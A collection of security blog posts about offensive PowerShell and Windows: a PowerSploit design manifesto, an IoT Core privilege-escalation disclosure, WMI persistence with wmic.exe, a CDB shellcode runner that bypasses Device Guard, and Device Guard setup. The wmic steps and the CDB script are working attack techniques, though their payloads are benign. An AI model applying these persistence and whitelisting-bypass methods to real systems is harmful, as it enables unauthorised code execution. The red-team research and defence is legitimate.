Normal view

There are new articles available, click to refresh the page.
Before yesterdayWindows Exploitation

The PowerSploit Manifesto

22 December 2015 at 13:30
It’s been a long journey and after so many years of learning PowerShell, starting to learn better software engineering disciplines, developing a large open source, offensive PowerShell project, using it in the field, and observing how others use it in the field, I feel compelled to provide a clearer vision for the direction in which I’d like to see PowerSploit go. Before I delve into what my vision is and the rationale for the vision, let’s get some perspective on some things.

The PowerShell Capabilities Matrix

I think the offensive usage of PowerShell can be bucketed into the following, non-mutually exclusive categories:

  1. You primarily use the benefits of PowerShell (e.g. facilitation of memory residence) to supplement a mostly non-PowerShell workflow. In other words, your workflow consists primarily of leveraging an existing framework like Metasploit, Empire, Cobalt Strike, etc. to seamlessly build and deliver payloads, irrespective of the language used to implement the payload.
  2. You recognize the value of PowerShell for conducting many phases of an operation in a Windows environment. You're not a tool developer but you need to be able to have a large offensive library to choose from that can be tailored to your engagement.
  3. You are a capable PowerShell tool developer and operator where modularity of the toolset is crucial because your operations are extremely tailored to a specific environment where stealth and operational effectiveness is crucial.

Mattifestation Goal #1: To build a library of capabilities catered to #3 that can ultimately trickle down to #1.

Operational Requirements and Design Challenges

Consider the following requirement from your Director of Offensive Operations:

Objective: We need the ability to capture the credentials of a target and not get caught doing so.

Let’s pretend that such a capability doesn’t exist yet. Two things were explicitly asked of us: 1) Capture target credentials and 2) don’t get caught.

The operations team leads get together and brainstorm how to achieve the director’s relatively vague objective. Each team lead knows that they all have unique operational constraints depending on the target so they come up with the following requirements for the developers:

  1. Mimikatz has proved to be an extremely effective tool for capturing credentials but we worry about it getting flagged by AV so we need you to load it in memory.
  2. Depending on the firewall restrictions and listening services on a target, multiple comms protocols will be required to both deploy and get Mimikatz results back to the operator. We need to be prepared with what the target will throw us.
  3. Because we’ll be dealing with sensitive data, we need to encrypt the Mimikatz results.
The developer, being a huge PowerShell fanboy has convinced the director and ops leads that it can accomplish every one of these achieved goals, all while keeping everything memory resident.

So the developer now has some basic requirements necessary to knock out the objectives of the ops team leads and director. The decision then becomes, how to package all of the implemented capabilities?

The developer could develop a “one size fits all” solution that encompasses all of the requirements into a single function – let’s call it Get-AllTheCreds. Such a tool would be great. It would give the operators everything they need in a simple, already pre-weaponized package. Problem solved. They now have an effective credential harvesting capability that works over multiple protocols. Everyone is happy. That is, until the director dictates a new requirement: we need the ability to steal files from a target without getting caught…

After a while, as the requirements grow, the developers quickly learn that development of the “one size fits all” solutions that their operators have loved isn’t going to scale. Instead, the developer proposes writing the following tools that can be stitched together as the ops lead sees fit:

Payload delivery
Invoke-Command - for WinRM payload deployment
Invoke-WmiCommand - for WMI payload deployment

Optional communications functionality
Send-TCPData
Send-UDPData
Send-ICMPData
Send-DropboxData
Receive-TCPData
Receive-UDPData
Receive-ICMPData
Receive-DropboxData

In-memory PE loader used to load Mimikatz or any other PE
Invoke-ReflectivePEInjection

Data encryption
Out-EncryptedText

This approach scales really well as it allows a developer to create and test each unit of functionality independently resulting in more modular and more reliable code. It also enables the operator to leverage only the minimal amount of functionality needed to carry out a targeted operation. At the same time though it places an additional burden upon the operator is that they will be required to decide which functions to include in their weaponized payload.

Mattifestation Goal #2: As one of the core developers of PowerSploit, I don't want to be in the game of deciding how people use PowerShell to carry out their operations. Rather, I want to be in the game of providing an arsenal of capabilities to the decision maker.

This decision has led to some discontent amongst those who want a fully pre-weaponized product and understandably so. Up until this point, the tools in PowerSploit haven’t had any dependencies. The problem as a developer is that this doesn’t scale if PowerSploit is to grow and it leaves the developer of the capabilities inferring what the “one size fits all” solution might be.

The Good ol’ Days...

Mattifestation Goal #3: Do your best to not alienate your existing user base and don't force them to resolve complicated dependencies.

Goal #3 is where the challenge lies in trying to cater to everyone. I want to modularize everything in PowerSploit but then that would leave many frustrated trying to ensure that they have all the dependencies they need. So what @harmj0y and I propose is the following:

  1. Modularize everything in PowerSploit. As in, make it a proper PowerShell module. Those who use it as a module won't have any dependencies to worry about because PowerShell modules are designed to resolve all dependencies. Modules are a beautiful thing in PowerShell for those who aren’t aware. They just aren’t feasible for in-memory weaponization.
  2. Most people in the business of using offensive PowerShell won’t use PowerSploit as a module on their target. For frameworks like Empire, Cobalt Strike, etc. that offer PowerShell weaponization, they will need a way to resolve and merge dependencies prior to payload deployment. For functions that require dependencies, we will include a machine-parsable list of required dependencies. These won’t be external dependencies but merely just a list of PowerSploit functions required by another PowerSploit function. We have made the decision that we will never require any dependencies not present in PowerSploit.
  3. People will likely want to use PowerSploit functions outside of a formal framework so for those people, we will provide dependency resolution scripts written in both PowerShell (e.g. Get-WeaponizedPayload) and Python that perform the tasks that follow. Providing this capability, while adding a mandatory step for users will solve the dependency issue and it will ensure that a script is produced that includes only the required functionality.
    1. Take a list of PowerSploit functions and generate a script that includes all of them with their required dependencies merged
    2. Generate a script that includes all functions and merged dependencies from a specified submodule – e.g. the Recon submodule which includes PowerView
    3. Takes a script or scriptblock as input, parses it and prepends any dependencies to a resulting output script
  4. We’re still debating how this solution would scale but the idea would be to also include a “release build” that would include all of the resolved dependencies for many of the most popular PowerSploit functions/submodules. An example of how this doesn’t scale well is in PowerView. PowerView relies upon the PSReflect library for calling Win32 API functions. PSReflect is a fairly sizeable chunk of code so would you want to include it every single PowerView function? That would result in unnecessary bloat. So you could prepend the PSReflect lib to all of the PowerView functions but then you get everything together as one large package and what if you only want to deploy a couple PowerView functions? This is just one of several reasons why I don’t think this option would scale but perhaps we could use this to throw a bone to those content with “the way things were” for a period of time.
The Future

We intend to incorporate these changes in the next major release of PowerSploit. By incorporating these proposed changes, what you'll see is a large increase in the code base and hopefully reduced dwell time in acceptance of new pull requests and issue handling. For example, I was reluctant to accept any new wrappers for Invoke-ReflectivePEInjection due to duplicate code being sprayed all over the place. Also, this more modular design paradigm will allow PowerSploit developers to focus on developing unique comms functionality independent of other capabilities. By moving forward with these changes, I can say that I will personally remain dedicated to moving PowerSploit forward and I hope that my enthusiasm will rub off on those wanting to contribute, weaponize these capabilities, and those just wanting to up excel their tradecraft. Lastly, you'll begin to hear me make more of a concerted effort to brand PowerSploit as an "offensive capabilities library" versus a framework. Nor should PowerSploit be considered a "pentest tool." Metasploit and Cobalt Strike are frameworks that weaponize and deploy payloads irrespective of the language used on the target. PowerSploit is a language-specific library that aims to empower the operator who has warmly welcomed PowerShell into their methodology.

As a final thought and plea, it is my expectation and hope that all pentesters and red teamers learn PowerShell. It is a required skill for so many reasons, many of which I’ve outlined here. Stop putting it off! Do effective pentesters and red teamers in a Linux environment get away without knowing simple bash scripting and command-line usage? No! So the next time you’re in a situation with some hacker buddies where you have hands on a machine and want to impress, are you going to choose the black screen or the blue screen???

Properly Retrieving Win32 API Error Codes in PowerShell

1 January 2016 at 20:38
Having worked with Win32 API functions enough in PowerShell using P/Invoke and reflection, I was constantly annoyed by the fact that I was often unable to correctly capture the correct error code from a function that sets its error code (by calling SetLastError) prior to returning to the caller despite setting SetLastError to True in the DllImportAttribute.


Consider the following, simple code that calls CopyFile within kernel32.dll:


$MethodDefinition = @'

[DllImport("kernel32.dll", CharSet = CharSet.Unicode, SetLastError = true)]

public static extern bool CopyFile(string lpExistingFileName, string lpNewFileName, bool bFailIfExists);

'@


$Kernel32 = Add-Type -MemberDefinition $MethodDefinition -Name 'Kernel32' -Namespace 'Win32' -PassThru


# Perform an invalid copy

$CopyResult = $Kernel32::CopyFile('C:\foo2', 'C:\foo1', $True)


# Retrieve the last error for CopyFile. The following error is expected:

# "The system cannot find the file specified"

$LastError = [ComponentModel.Win32Exception][Runtime.InteropServices.Marshal]::GetLastWin32Error()


# An incorrect error is retrieved:

# "The system could not find the environment option that was entered"

# Grrrrrrrrrrrrrrrrr...


$LastError


I knew that you needed to retrieve the last error code immediately after a call to a Win32 function so naturally, I would have expected the correct error code. The one returned was consistently nonsensical, however. I don’t really know how I thought to try the following but I finally figured out how to properly capture the correct error code after an unmanaged function call – capture the error code on the same line (i.e. immediately after a semicolon). Apparently, the simple act of progressing to the next line in a PowerShell console is enough for your thread to set a different error code…


The following code demonstrates how to accurately capture the last set error code:


$MethodDefinition = @'

[DllImport("kernel32.dll", CharSet = CharSet.Unicode, SetLastError = true)]

public static extern bool CopyFile(string lpExistingFileName, string lpNewFileName, bool bFailIfExists);

'@


$Kernel32 = Add-Type -MemberDefinition $MethodDefinition -Name 'Kernel32' -Namespace 'Win32' -PassThru


# Perform an invalid copy

$CopyResult = $Kernel32::CopyFile('C:\foo2', 'C:\foo1', $True);$LastError = [ComponentModel.Win32Exception][Runtime.InteropServices.Marshal]::GetLastWin32Error()


# The correct error is retrieved:

# "The system cannot find the file specified"

# Yayyyyyyyyyyy....


$LastError


That’s all. I felt it was necessary to share this as I’m sure others have encountered this issue and were unable to find any solution on the Internet as it pertained to PowerShell.


Happy New Year!

Misconfigured Service ACL Elevation of Privilege Vulnerability in Win10 IoT Core Build 14393

25 July 2016 at 12:20
As of this writing, the latest public preview of Windows 10 IoT Core (build 14393) suffers from an elevation of privilege vulnerability via a misconfigured service ACL. The InputService service which run as SYSTEM grants authenticated users (i.e. members of the “NT AUTHORITY\Authenticated Users” group) SERVICE_ALL_ACCESS access rights, allowing an unprivileged, authenticated user to change the binary path of the service and gain elevated code execution upon restarting the service.

For reference, you can validate that InputService runs as SYSTEM with the following commands:

$InputService = Get-CimInstance -ClassName Win32_Service -Filter 'Name = "InputService"'

$InputService.StartName

Get-CimInstance -ClassName Win32_Process -Filter "ProcessId=$($InputService.ProcessId)" | Invoke-CimMethod -MethodName GetOwner

This trivial vulnerability was discovered while running the Get-CSVulnerableServicePermission function in CimSweep against an IoT Core instance running on my Raspberry Pi 2. CimSweep is designed to perform incident response and hunt operations entirely over WMI/CIM.

Exploitation

I wrote a proof of concept exploit that simply adds an unprivileged user to the Administrators group.

While this is a classic service misconfiguration vulnerability, there are several caveats to be mindful of when exploiting it on Win 10 IoT Core. First of all, IoT Core is designed to be managed remotely and for that, you are given two remote management options: PowerShell Remoting and SSH. I chose to use PowerShell Remoting in my PoC exploit primarily to point out that the default SDDL for PowerShell Remoting in IoT Core requires that users be members of the “Remote Management Users” group. Additional information on administering IoT Core with PowerShell can be found here. For reference, the default SDDL for PowerShell Remoting can be obtained and interpreted with the following command:

Get-PSSessionConfiguration -Name microsoft.powershell | Select-Object -ExpandProperty Permission

There is no such group membership requirement for SSH. Hopefully, at a future point, SSH endpoints on Windows will have the granular security controls that PowerShell Remoting offers via the PSSessionConfiguration cmdlets. Some additional caveats were that when I remoted in as an unprivileged user, I did not have sufficient privileges to use the Service cmdlets (Get-Service, Set-Service, etc.) or CIM cmdlets (Get-CimInstance, Invoke-CimMethod, etc.) in order to change the service configuration. Fortunately, sc.exe presented no such restrictions.

Conclusion

While this is by no means a “sexy” vulnerability, the fact that such a trivial vulnerability was present in a modern Windows OS tells me that perhaps Win 10 IoT Core isn’t getting the security scrutiny of other Windows operating systems. I hope that many of the same security controls and mitigations will eventually be applied to IoT Core if the plan is for this to be the operating system that drives critical infrastructure.

Lastly, if you’re attending Black Hat USA 2016, you should plan on attending Paul Sabanal’s (@polsab) talk on Windows 10 IoT Core!

Disclosure Timeline

May 22, 2016 – Vulnerability reported to MSRC
May 23, 2016 – MSRC opened a case number for the issue.
July 20, 2016 – Follow-up email sent to MSRC asking for a status update. No response received
July 25, 2016 – Decision made to release the vulnerability details

WMI Persistence using wmic.exe

12 August 2016 at 15:57
Until recently, I didn’t think it was possible to perform WMI persistence using wmic.exe but after some experimentation, I finally figured it out. To date, WMI persistence via dropping MOF files or by using PowerShell has been fairly well documented but documentation on performing this with wmic.exe doesn’t seem to exist. I won’t get into the background of WMI persistence in this article as the concepts are articulated clearly in the two previous links. The challenge in using wmic.exe to perform WMI persistence is that when creating an instance of a __FilterToConsumerBinding class, it requires references to an existing __EventFilter and __EventConsumer. It turns out that you can reference existing WMI objects in wmic.exe using the syntax provided in a WMI object’s __RELPATH property! Okay. Enough theory. Let’s dive into an example.


In this example, we’re going to use wmic.exe to create a PoC USB drive infector that will immediately drop the EICAR string to eicar.txt in the root folder of any inserted removable media.


1) Create an __EventFilter instance.


wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="VolumeArrival", QueryLanguage="WQL", Query="SELECT * FROM Win32_VolumeChangeEvent WHERE EventType=2"


2) Create an __EventConsumer instance. CommandLineEventConsumer in this example.


wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="InfectDrive", CommandLineTemplate="powershell.exe -NoP -C [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('WDVPIVAlQEFQWzRcUFpYNTQoUF4pN0NDKTd9JEVJQ0FSLVNUQU5EQVJELUFOVElWSVJVUy1URVNULUZJTEUhJEgrSCo=')) | Out-File %DriveName%\eicar.txt"


3) Obtain the __RELPATH of the __EventFilter and __EventConsumer instances. This built-in, system property provides the object instance syntax needed when creating a __FilterToConsumerBinding instance.


wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter GET __RELPATH /FORMAT:list

wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer GET __RELPATH /FORMAT:list


4) Create a __FilterToConsumerBinding instance. The syntax used for the Filter and Consumer properties came from the __RELPATH properties in the previous step.


wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name=\"VolumeArrival\"", Consumer="CommandLineEventConsumer.Name=\"InfectDrive\""


At this point, the USB drive infector is registered and running!


5) Optional: Remove all instances - i.e. unregister the permanent WMI event subscription.


wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter WHERE Name="VolumeArrival" DELETE

wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer WHERE Name="InfectDrive" DELETE


So that’s all there is to it! Hopefully, this will be a useful tool to add to your offensive WMI arsenal!

Bypassing Application Whitelisting by using WinDbg/CDB as a Shellcode Runner

15 August 2016 at 14:16
Imagine you’ve gained access to an extremely locked down Windows 10 host running Device Guard. The Device Guard policy is such that all PEs (exe, dll, sys, etc.) must be signed by Microsoft. No other signed code is authorized. Additionally, a side effect of Device Guard being enabled is that PowerShell will be locked down in constrained language mode so arbitrary code execution is ruled out in the context of PowerShell (unless you have a bypass for that, of course). You have a shellcode payload you’d like to execute. What options do you have?


You’re an admin. You can just disable Device Guard, right? Nope. The Device Guard policy is signed and you don’t have access to the code signing cert to sign and plant a more permissive policy. To those who want to challenge this claim, please go forth and do some Device Guard research and find a bypass. For us mere mortals though, how can we execute our shellcode considering we can’t just disable Device Guard?


The obvious solution dawned on me recently: I simply asked myself, “what is a tool that’s signed by Microsoft that will execute code, preferably in memory?” WinDbg/CDB of course! I had used WinDbg a million times to execute shellcode for dynamic malware analysis but I never considered using it as a generic code execution method for malware in a signed process. Now, in order to execute a shellcode buffer, there are generally three requirements to get it to execute in any process:


1)      You need to be able to allocate at least RX memory for it. In reality, you’ll need RWX memory though if the shellcode is self-modifying – i.e. any encoded Metasploit shellcode.

2)      You need a mechanism to copy the shellcode buffer to the allocated memory.

3)      You need a way to direct the flow of execution of a thread to the shellcode buffer.


Fortunately, WinDbg and CDB have commands to achieve all of this.


1)  .dvalloc [Size of shellcode]


Allocates a page-aligned RWX buffer of the size you specify.


2)  eb [Shellcode address] [Shellcode byte]


Writes a byte to the address specified.


3)  r @$ip=[Shellcode address]


Points the instruction pointer to the address specified. Note: $ip is a generic, pseudo register that refers to EIP, RIP, or PC depending upon the architecture (x86, amd64, and ARM, respectively).


With those fundamental components, we have pretty much everything we need to implement a WinDbg or CDB shellcode runner. The following proof-of-concept example will launch 64-bit shellcode (pops calc) in notepad.exe. To get this running, just save the text to a file (I named it x64_calc.wds) and launch it with the following command: cdb.exe -cf x64_calc.wds -o notepad.exe


$$ Save this to a file - e.g. x64_calc.wds

$$ Example: launch this shellcode in a host notepad.exe process.

$$ cdb.exe -cf x64_calc.wds -o notepad.exe


$$ Allocate 272 bytes for the shellcode buffer

$$ Save the address of the resulting RWX in the pseudo $t0 register

.foreach /pS 5  ( register { .dvalloc 272 } ) { r @$t0 = register }


$$ Copy each individual shellcode byte to the allocated RWX buffer

$$ Note: The `eq` command could be used to save space, if desired.

$$ Note: .readmem can be used to read a shellcode buffer too but

$$   shellcode on disk will be subject to AV scanning.

;eb @$t0+00 FC;eb @$t0+01 48;eb @$t0+02 83;eb @$t0+03 E4

;eb @$t0+04 F0;eb @$t0+05 E8;eb @$t0+06 C0;eb @$t0+07 00

;eb @$t0+08 00;eb @$t0+09 00;eb @$t0+0A 41;eb @$t0+0B 51

;eb @$t0+0C 41;eb @$t0+0D 50;eb @$t0+0E 52;eb @$t0+0F 51

;eb @$t0+10 56;eb @$t0+11 48;eb @$t0+12 31;eb @$t0+13 D2

;eb @$t0+14 65;eb @$t0+15 48;eb @$t0+16 8B;eb @$t0+17 52

;eb @$t0+18 60;eb @$t0+19 48;eb @$t0+1A 8B;eb @$t0+1B 52

;eb @$t0+1C 18;eb @$t0+1D 48;eb @$t0+1E 8B;eb @$t0+1F 52

;eb @$t0+20 20;eb @$t0+21 48;eb @$t0+22 8B;eb @$t0+23 72

;eb @$t0+24 50;eb @$t0+25 48;eb @$t0+26 0F;eb @$t0+27 B7

;eb @$t0+28 4A;eb @$t0+29 4A;eb @$t0+2A 4D;eb @$t0+2B 31

;eb @$t0+2C C9;eb @$t0+2D 48;eb @$t0+2E 31;eb @$t0+2F C0

;eb @$t0+30 AC;eb @$t0+31 3C;eb @$t0+32 61;eb @$t0+33 7C

;eb @$t0+34 02;eb @$t0+35 2C;eb @$t0+36 20;eb @$t0+37 41

;eb @$t0+38 C1;eb @$t0+39 C9;eb @$t0+3A 0D;eb @$t0+3B 41

;eb @$t0+3C 01;eb @$t0+3D C1;eb @$t0+3E E2;eb @$t0+3F ED

;eb @$t0+40 52;eb @$t0+41 41;eb @$t0+42 51;eb @$t0+43 48

;eb @$t0+44 8B;eb @$t0+45 52;eb @$t0+46 20;eb @$t0+47 8B

;eb @$t0+48 42;eb @$t0+49 3C;eb @$t0+4A 48;eb @$t0+4B 01

;eb @$t0+4C D0;eb @$t0+4D 8B;eb @$t0+4E 80;eb @$t0+4F 88

;eb @$t0+50 00;eb @$t0+51 00;eb @$t0+52 00;eb @$t0+53 48

;eb @$t0+54 85;eb @$t0+55 C0;eb @$t0+56 74;eb @$t0+57 67

;eb @$t0+58 48;eb @$t0+59 01;eb @$t0+5A D0;eb @$t0+5B 50

;eb @$t0+5C 8B;eb @$t0+5D 48;eb @$t0+5E 18;eb @$t0+5F 44

;eb @$t0+60 8B;eb @$t0+61 40;eb @$t0+62 20;eb @$t0+63 49

;eb @$t0+64 01;eb @$t0+65 D0;eb @$t0+66 E3;eb @$t0+67 56

;eb @$t0+68 48;eb @$t0+69 FF;eb @$t0+6A C9;eb @$t0+6B 41

;eb @$t0+6C 8B;eb @$t0+6D 34;eb @$t0+6E 88;eb @$t0+6F 48

;eb @$t0+70 01;eb @$t0+71 D6;eb @$t0+72 4D;eb @$t0+73 31

;eb @$t0+74 C9;eb @$t0+75 48;eb @$t0+76 31;eb @$t0+77 C0

;eb @$t0+78 AC;eb @$t0+79 41;eb @$t0+7A C1;eb @$t0+7B C9

;eb @$t0+7C 0D;eb @$t0+7D 41;eb @$t0+7E 01;eb @$t0+7F C1

;eb @$t0+80 38;eb @$t0+81 E0;eb @$t0+82 75;eb @$t0+83 F1

;eb @$t0+84 4C;eb @$t0+85 03;eb @$t0+86 4C;eb @$t0+87 24

;eb @$t0+88 08;eb @$t0+89 45;eb @$t0+8A 39;eb @$t0+8B D1

;eb @$t0+8C 75;eb @$t0+8D D8;eb @$t0+8E 58;eb @$t0+8F 44

;eb @$t0+90 8B;eb @$t0+91 40;eb @$t0+92 24;eb @$t0+93 49

;eb @$t0+94 01;eb @$t0+95 D0;eb @$t0+96 66;eb @$t0+97 41

;eb @$t0+98 8B;eb @$t0+99 0C;eb @$t0+9A 48;eb @$t0+9B 44

;eb @$t0+9C 8B;eb @$t0+9D 40;eb @$t0+9E 1C;eb @$t0+9F 49

;eb @$t0+A0 01;eb @$t0+A1 D0;eb @$t0+A2 41;eb @$t0+A3 8B

;eb @$t0+A4 04;eb @$t0+A5 88;eb @$t0+A6 48;eb @$t0+A7 01

;eb @$t0+A8 D0;eb @$t0+A9 41;eb @$t0+AA 58;eb @$t0+AB 41

;eb @$t0+AC 58;eb @$t0+AD 5E;eb @$t0+AE 59;eb @$t0+AF 5A

;eb @$t0+B0 41;eb @$t0+B1 58;eb @$t0+B2 41;eb @$t0+B3 59

;eb @$t0+B4 41;eb @$t0+B5 5A;eb @$t0+B6 48;eb @$t0+B7 83

;eb @$t0+B8 EC;eb @$t0+B9 20;eb @$t0+BA 41;eb @$t0+BB 52

;eb @$t0+BC FF;eb @$t0+BD E0;eb @$t0+BE 58;eb @$t0+BF 41

;eb @$t0+C0 59;eb @$t0+C1 5A;eb @$t0+C2 48;eb @$t0+C3 8B

;eb @$t0+C4 12;eb @$t0+C5 E9;eb @$t0+C6 57;eb @$t0+C7 FF

;eb @$t0+C8 FF;eb @$t0+C9 FF;eb @$t0+CA 5D;eb @$t0+CB 48

;eb @$t0+CC BA;eb @$t0+CD 01;eb @$t0+CE 00;eb @$t0+CF 00

;eb @$t0+D0 00;eb @$t0+D1 00;eb @$t0+D2 00;eb @$t0+D3 00

;eb @$t0+D4 00;eb @$t0+D5 48;eb @$t0+D6 8D;eb @$t0+D7 8D

;eb @$t0+D8 01;eb @$t0+D9 01;eb @$t0+DA 00;eb @$t0+DB 00

;eb @$t0+DC 41;eb @$t0+DD BA;eb @$t0+DE 31;eb @$t0+DF 8B

;eb @$t0+E0 6F;eb @$t0+E1 87;eb @$t0+E2 FF;eb @$t0+E3 D5

;eb @$t0+E4 BB;eb @$t0+E5 E0;eb @$t0+E6 1D;eb @$t0+E7 2A

;eb @$t0+E8 0A;eb @$t0+E9 41;eb @$t0+EA BA;eb @$t0+EB A6

;eb @$t0+EC 95;eb @$t0+ED BD;eb @$t0+EE 9D;eb @$t0+EF FF

;eb @$t0+F0 D5;eb @$t0+F1 48;eb @$t0+F2 83;eb @$t0+F3 C4

;eb @$t0+F4 28;eb @$t0+F5 3C;eb @$t0+F6 06;eb @$t0+F7 7C

;eb @$t0+F8 0A;eb @$t0+F9 80;eb @$t0+FA FB;eb @$t0+FB E0

;eb @$t0+FC 75;eb @$t0+FD 05;eb @$t0+FE BB;eb @$t0+FF 47

;eb @$t0+100 13;eb @$t0+101 72;eb @$t0+102 6F;eb @$t0+103 6A

;eb @$t0+104 00;eb @$t0+105 59;eb @$t0+106 41;eb @$t0+107 89

;eb @$t0+108 DA;eb @$t0+109 FF;eb @$t0+10A D5;eb @$t0+10B 63

;eb @$t0+10C 61;eb @$t0+10D 6C;eb @$t0+10E 63;eb @$t0+10F 00


$$ Redirect execution to the shellcode buffer

r @$ip=@$t0


$$ Continue program execution - i.e. execute the shellcode

g


$$ Continue program execution after hitting a breakpoint

$$ upon starting calc.exe. This is specific to this shellcode.

g


$$ quit cdb.exe

q


I chose to use cdb.exe in the example as it is a command-line debugger whereas WinDbg is a GUI debugger. Additionally, these debuggers are portable. It imports DLLs that are all present in System32. So the only files that you would be dropping on the target system is cdb.exe and the script above - none of which should be flagged by AV. In reality, the script isn’t even required on disk. You can just paste the commands in manually if you like.


Now, you may be starting to ask yourself, “how could I go about blocking windbg.exe, cdb.exe, kd.exe etc.?“ You might block the hashes from executing with AppLocker. Great, but then someone will just run an older version of any of those programs and it won’t block future versions either. You could block anything named cdb.exe, windbg.exe, etc. from running. Okay, then the attacker will just rename it to foo.exe. You could blacklist the certificate used to sign cdb.exe, windbg.exe, etc. Then you might be blocking other legitimate Microsoft applications signed with the same certificate. On Windows RT, this attack was somewhat mitigated by the fact that user-mode code integrity (UMCI) prevented a user from attaching a debugger invasively – what I did in this example. The ability to enforce this with Device Guard, however, does not present itself as a configuration feature. At the time of this writing, I don’t have any realistic preventative defenses but I will certainly be looking into them as I dig into Device Guard more. As far as detection is concerned, there ought to be plenty of creative ways to detect this including something as simple as command-line auditing.



Anyway, while this may not be the sexiest of ways to execute shellcode, I’d like to think it’s a decent, generic application whitelisting bypass that will be difficult in practice to prevent. Enjoy!

Introduction to Windows Device Guard: Introduction and Configuration Strategy

6 September 2016 at 14:24

Introduction

Welcome to the first in a series a Device Guard blog posts. This post is going to cover some introductory concepts about Device Guard and it will detail the relatively aggressive strategy that I used to configure it on my Surface Pro 4 tablet running a fresh install of Windows 10 Enterprise Anniversary Update (1607). The goal of this introductory post is to start getting you comfortable with Device Guard and experimenting with it yourselves. In subsequent posts, I will begin to describe various bypasses and will describe methods to effectively mitigate against each bypass. The ultimate goal of this series of posts is to educate readers about the strengths and current weaknesses of what I consider to be an essential technology in preventing a massive class of malware infections in a post-compromise scenario (i.e. exploit mitigation is another subject altogether).


Device Guard Basics

Device Guard is a powerful set of hardware and software security features available in Windows 10 Enterprise and Server 2016 (including Nano Server with caveats that I won’t explain in this post) that aim to block the loading of drivers, user-mode binaries (including DLLs), MSIs, and scripts (PowerShell and Windows Script Host - vbs, js, wsf, wsc) that are not explicitly authorized per policy. In other words, it’s a whitelisting solution. The idea, in theory, being a means to prevent arbitrary unsigned code execution (excluding remote exploits). Right off the bat, you may already be asking, “why not just use AppLocker and why is Microsoft recreating the wheel?” I certainly had those questions and I will attempt to address them later in the post.


Device Guard can be broken down into two primary components:


1 - Code integrity (CI)

The code integrity component of Device Guard enforces both kernel mode code integrity (KMCI) and user mode code integrity (UMCI). The rules enforced by KMCI and UMCI are dictated by a code integrity policy - a configurable list of whitelist rules that can apply to drivers, user-mode binaries, MSIs, and scripts. Now, technically, PowerShell scripts can still execute, but unless the script or module is explicitly allowed via the code integrity policy, it will be forced to execute in constrained language mode, which prevents a user from calling Add-Type, instantiating .NET objects, and invoking .NET methods, effectively precluding PowerShell from being used to gain any form of arbitrary unsigned code execution. Additionally, WSH scripts will still execute if they don't comply with the deployed code integrity policy, but they will fail to instantiate any COM objects which is reasonable considering unsigned PowerShell will still execute but in a very limited fashion. As of this writing, the script-based protections of Device Guard are not documented by Microsoft.

So with a code integrity policy, for example, if I wanted my system to only load drivers or user-mode code signed by Microsoft, such rules would be stated in my policy. Code integrity policies are created using the cmdlets present in the ConfigCI PowerShell module. CI policies are configured as a plaintext XML document then converted to a binary-encoded XML format when they are deployed. For additional protections, CI policies can also be signed with a valid code-signing certificate.


2 - Virtualization-based Security (VBS)

Virtualization-based Security is comprised of several hypervisor and modern hardware-based security features are used to protect the enforcement of a code integrity policy, Credential Guard, and shielded VMs. While it is not mandatory to have hardware that supports VBS features, without it, the effectiveness of Device Guard will be severely hampered. Without delving into too much detail, VBS will improve the enforcement of Device Guard by attempting to prevent disabling code integrity enforcement even as an elevated user who doesn’t have physical access to the target. It can also prevent DMA-based attacks and also restrict any kernel code from creating executable memory that isn’t explicitly conformant to the code integrity policy. The following resources elaborate on VBS:



Microsoft provides a Device Guard and Credential Guard hardware readiness tool that you should use to assess which hardware-specific components of Device Guard and/or Credential Guard can be enabled. This post does not cover Credential Guard.


Configuration Steps and Strategy

Before we get started, I highly recommend that you read the official Microsoft documentation on Device Guard and also watch the Ignite 2015 talk detailing Device Guard design and configuration - Dropping the Hammer Down on Malware Threats with Windows 10’s Device Guard (PPTX, configuration script). The Ignite talk covers some aspects of Device Guard that are not officially documented.


You can download the fully documented code I used to generate my code integrity policy. You can also download the finalized code integrity policy that the code below generated for my personal Surface Pro 4. Now, absolutely do not just deploy that to your system. I’m only providing it as a reference for comparison to the code integrity policy that you create for your system. Do not complain that it might be overly permissive (because I know it is in some respects) and please do not ask why this policy doesn’t work on your system. You also probably wouldn't want to trust code signed by my personal code-signing certificate. ;)


In the Ignite talk linked to above, Scott and Jeffrey describe creating a code integrity policy for a golden system by scanning the computer for all binaries present on it and allowing any driver, script, MSI, application, or DLL to execute based on the certificate used to sign those binaries/scripts. While this is in my opinion, a relatively simple way to establish an initial policy, in practice, I consider this approach to be overly permissive. When I used this methodology on my fresh install of Windows 10 Enterprise Anniversary Update with Chrome installed, the code integrity policy generated consisted of what would be considered normal certificates mixed in with several test signing certificates. Personally, I don’t want to grant anything permission to run that was signed with a test certificate. Notable certificates present in the generated policy were the following:


  • Microsoft Windows Phone Production PCA 2012
  • MSIT Test CodeSign CA 6
  • OEMTest OS Root CA
  • WDKTestCert wdclab,130885612892544312

Upon finding such certificate oddities, I decided to tackle development of a code integrity policy another way – create an empty policy (i.e. deny everything), configure Device Guard in audit mode, and then craft my policy based on what was loaded and denied in the CodeIntegrity event log.


So now let’s dive into how I configured my Surface Pro 4. For starters, I only wanted signed Microsoft code to execute (with a couple third party hardware driver exceptions). Is this a realistic configuration? It depends but probably not. You’re probably going to want non-Microsoft code to run as well. That’s fine. We can configure that later but my personal goal is to only allow Microsoft code to run since everyone using Device Guard will need to do that at a minimum. I will then have a pristine, locked down system which I can then use to research ways of gaining unsigned code execution with signed Microsoft binaries. Now, just to be clear, if you want your system be able to boot and apply updates, you’ll obviously need to allow code signed by Microsoft to run. So to establish my “golden system,” I did the following:


  1. Performed a fresh install of Windows 10 Enterprise Anniversary Update.
  2. Ensured that it was fully updated via Windows Update.

In the empty, template policy, I have the following policy rules enabled:

  1 - Unsigned System Integrity Policy (during policy configuration/testing phases)


Signing your code integrity policy makes it so that deployed policies cannot be removed (assuming they are locked in UEFI using VBS protections) and that they can only be updated using approved code signing certificates as specified in the policy.


  2 - Audit Mode (during policy configuration/testing phases)


